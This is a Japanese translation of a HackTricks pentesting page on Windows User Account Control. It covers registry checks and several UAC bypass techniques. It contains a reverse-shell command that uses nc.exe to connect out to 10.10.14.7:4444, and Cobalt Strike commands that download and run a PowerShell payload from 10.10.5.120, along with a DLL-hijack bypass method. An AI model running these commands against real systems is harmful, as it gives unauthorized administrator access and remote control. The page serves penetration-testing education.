mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00

Translator e9ee836d52 Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

2024-07-19 16:28:25 +00:00

23 KiB

Raw Blame History

UAC - ユーザーアカウント制御

{% hint style="success" %} AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを送信してください。

{% endhint %}

Trickestを使用して、世界で最も高度なコミュニティツールによって駆動されるワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

UAC

ユーザーアカウント制御 (UAC)は、昇格された活動のための同意プロンプトを有効にする機能です。アプリケーションには異なるintegrityレベルがあり、高いレベルのプログラムは、システムを危険にさらす可能性のあるタスクを実行できます。UACが有効になっている場合、アプリケーションやタスクは常に非管理者アカウントのセキュリティコンテキストで実行され、管理者が明示的にこれらのアプリケーション/タスクに管理者レベルのアクセスを許可しない限り、システムを実行することはできません。これは、管理者が意図しない変更から保護される便利な機能ですが、セキュリティ境界とは見なされません。

インテグリティレベルに関する詳細情報：

{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}

UACが有効な場合、管理者ユーザーには2つのトークンが与えられます：通常のアクションを通常レベルで実行するための標準ユーザーキーと、管理者権限を持つものです。

このページでは、UACの動作について詳細に説明しており、ログオンプロセス、ユーザーエクスペリエンス、UACアーキテクチャが含まれています。管理者は、セキュリティポリシーを使用して、ローカルレベルで自組織に特有のUACの動作を構成することができ（secpol.mscを使用）、またはActive Directoryドメイン環境でグループポリシーオブジェクト（GPO）を介して構成して展開することができます。さまざまな設定については、こちらで詳しく説明されています。UACに設定できるグループポリシー設定は10個あります。以下の表は追加の詳細を提供します：

グループポリシー設定	レジストリキー	デフォルト設定
ユーザーアカウント制御：組み込みの管理者アカウントの管理者承認モード	FilterAdministratorToken	無効
ユーザーアカウント制御：UIAccessアプリケーションがセキュアデスクトップを使用せずに昇格を要求できるようにする	EnableUIADesktopToggle	無効
ユーザーアカウント制御：管理者の管理者承認モードにおける昇格プロンプトの動作	ConsentPromptBehaviorAdmin	非Windowsバイナリに対して同意を求めるプロンプト
ユーザーアカウント制御：標準ユーザーの昇格プロンプトの動作	ConsentPromptBehaviorUser	セキュアデスクトップでの資格情報を求めるプロンプト
ユーザーアカウント制御：アプリケーションのインストールを検出し、昇格を要求する	EnableInstallerDetection	有効（ホームのデフォルト）無効（エンタープライズのデフォルト）
ユーザーアカウント制御：署名され、検証された実行可能ファイルのみを昇格させる	ValidateAdminCodeSignatures	無効
ユーザーアカウント制御：セキュアな場所にインストールされたUIAccessアプリケーションのみを昇格させる	EnableSecureUIAPaths	有効
ユーザーアカウント制御：すべての管理者を管理者承認モードで実行する	EnableLUA	有効
ユーザーアカウント制御：昇格を要求する際にセキュアデスクトップに切り替える	PromptOnSecureDesktop	有効
ユーザーアカウント制御：ファイルおよびレジストリの書き込み失敗をユーザーごとの場所に仮想化する	EnableVirtualization	有効

UACバイパス理論

一部のプログラムは、ユーザーが 管理者グループに属している場合に自動的に昇格されます。これらのバイナリには、_Manifests内にautoElevateオプションが値True_で含まれています。バイナリはMicrosoftによって署名されている必要があります。

次に、UACをバイパス（中のインテグリティレベルから高に昇格）するために、一部の攻撃者はこの種のバイナリを使用して任意のコードを実行します。なぜなら、それは高いレベルのインテグリティプロセスから実行されるからです。

バイナリの_Manifestを確認するには、Sysinternalsのツールsigcheck.exe_を使用できます。また、_Process Explorer_または_Sysinternals_の_Process Monitor_を使用してプロセスのインテグリティレベルを確認できます。

UACの確認

UACが有効かどうかを確認するには、次の操作を行います：

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA    REG_DWORD    0x1

もし**1であれば、UACは有効です。もし0または存在しない場合、UACは無効**です。

次に、どのレベルが設定されているかを確認します：

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin    REG_DWORD    0x5

0 の場合、UACはプロンプトを表示しません（無効のように）
1 の場合、管理者はユーザー名とパスワードを求められ、高権限でバイナリを実行します（セキュアデスクトップ上で）
2 （常に通知）の場合、UACは管理者が高権限で何かを実行しようとするたびに常に確認を求めます（セキュアデスクトップ上で）
3 の場合、1 と同様ですが、セキュアデスクトップ上での必要はありません
4 の場合、2 と同様ですが、セキュアデスクトップ上での必要はありません
5 （デフォルト）の場合、非Windowsバイナリを高権限で実行するために管理者に確認を求めます

次に、LocalAccountTokenFilterPolicy の値を確認する必要があります。
値が 0 の場合、RID 500 ユーザー（組み込みの管理者）のみがUACなしで管理タスクを実行でき、1 の場合は、「Administrators」 グループ内のすべてのアカウントがそれを実行できます。

最後に、キー FilterAdministratorToken の値を確認します。
0（デフォルト）の場合、組み込みの管理者アカウントはリモート管理タスクを実行でき、1 の場合、組み込みの管理者アカウントはリモート管理タスクを実行できませんが、LocalAccountTokenFilterPolicy が 1 に設定されている場合を除きます。

概要

EnableLUA=0 または 存在しない場合、誰に対してもUACなし
EnableLua=1 かつ LocalAccountTokenFilterPolicy=1 の場合、誰に対してもUACなし
EnableLua=1 かつ LocalAccountTokenFilterPolicy=0 かつ FilterAdministratorToken=0 の場合、RID 500（組み込みの管理者）に対してUACなし
EnableLua=1 かつ LocalAccountTokenFilterPolicy=0 かつ FilterAdministratorToken=1 の場合、全員に対してUACあり

このすべての情報は、metasploit モジュール post/windows/gather/win_privs を使用して収集できます。

ユーザーのグループを確認し、整合性レベルを取得することもできます。

net user %username%
whoami /groups | findstr Level

UACバイパス

{% hint style="info" %} 被害者にグラフィカルアクセスがある場合、UACバイパスは簡単です。UACプロンプトが表示されたときに「はい」をクリックするだけです。 {% endhint %}

UACバイパスが必要な状況は次のとおりです: UACが有効で、プロセスが中程度の整合性コンテキストで実行されており、ユーザーが管理者グループに属している場合。

UACが最高のセキュリティレベル（常に）に設定されている場合、UACをバイパスするのは他のレベル（デフォルト）の場合よりもはるかに難しいことを言及することが重要です。

UAC無効

UACがすでに無効になっている場合（ConsentPromptBehaviorAdminが**0）、次のようなもので管理者権限でリバースシェルを実行**できます（高整合性レベル）。

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UACバイパスとトークン複製

非常に基本的なUAC "バイパス"（フルファイルシステムアクセス）

管理者グループに属するユーザーのシェルがあれば、C$ 共有をSMB（ファイルシステム）経由で新しいディスクにマウントすることができ、ファイルシステム内のすべてにアクセスできます（管理者のホームフォルダも含む）。

{% hint style="warning" %} このトリックはもう機能していないようです {% endhint %}

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UACバイパスとCobalt Strike

Cobalt Strikeの技術は、UACが最大のセキュリティレベルに設定されていない場合にのみ機能します。

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire と Metasploit には、UAC を バイパス するためのいくつかのモジュールがあります。

KRBUACBypass

ドキュメントとツールは https://github.com/wh0amitz/KRBUACBypass にあります。

UAC バイパスエクスプロイト

UACME は、いくつかの UAC バイパスエクスプロイトの コンパイル です。UACME を Visual Studio または msbuild を使用してコンパイルする必要があります。コンパイルにより、いくつかの実行可能ファイル（例: Source\Akagi\outout\x64\Debug\Akagi.exe）が作成されます。どれが必要かを知っておく必要があります。
注意が必要です。なぜなら、いくつかのバイパスは、他のプログラムを促すことがあり、ユーザーに何かが起こっていることを警告します。

UACME には、各技術が動作し始めた ビルドバージョン が含まれています。あなたのバージョンに影響を与える技術を検索できます：

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Also, using this page you get the Windows release 1607 from the build versions.

More UAC bypass

すべての技術は、AUCをバイパスするために完全なインタラクティブシェルを必要とします（一般的なnc.exeシェルでは不十分です）。

meterpreterセッションを使用して取得できます。Session値が1のプロセスに移行します：

(explorer.exe は動作するはずです)

UAC Bypass with GUI

GUIにアクセスできる場合は、UACプロンプトが表示されたときにそれを受け入れるだけで済みます。 バイパスは本当に必要ありません。したがって、GUIにアクセスすることでUACをバイパスできます。

さらに、誰かが使用していたGUIセッション（おそらくRDP経由）を取得した場合、管理者として実行されるいくつかのツールがあり、そこからcmdを例えば管理者として直接実行でき、再度UACによってプロンプトされることはありません。 https://github.com/oski02/UAC-GUI-Bypass-appverifのように。これは少しステルスかもしれません。

Noisy brute-force UAC bypass

騒がしくなることを気にしない場合は、常に**https://github.com/Chainski/ForceAdminのようなものを実行して、ユーザーが受け入れるまで権限を昇格させるように要求することができます**。

Your own bypass - Basic UAC bypass methodology

UACMEを見てみると、ほとんどのUACバイパスはDLLハイジャックの脆弱性を悪用しています（主に悪意のあるdllを_C:\Windows\System32_に書き込むこと）。 DLLハイジャックの脆弱性を見つける方法を学ぶには、これをお読みください。

自動昇格するバイナリを見つけます（実行時に高い整合性レベルで実行されることを確認します）。
procmonを使用して、DLLハイジャックに脆弱な**"NAME NOT FOUND"**イベントを見つけます。
おそらく、書き込み権限がないいくつかの保護されたパス（C:\Windows\System32など）内にDLLを書き込む必要があります。これをバイパスするには：
1. wusa.exe：Windows 7、8、8.1。保護されたパス内にCABファイルの内容を抽出することを許可します（このツールは高い整合性レベルから実行されるため）。
2. IFileOperation：Windows 10。
保護されたパス内にDLLをコピーし、脆弱で自動昇格されたバイナリを実行するためのスクリプトを準備します。

Another UAC bypass technique

自動昇格されたバイナリが実行されるためのバイナリまたはコマンドの名前/パスをレジストリから読み取ろうとするのを監視することに基づいています（このバイナリがHKCU内でこの情報を検索する場合、より興味深いです）。

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today: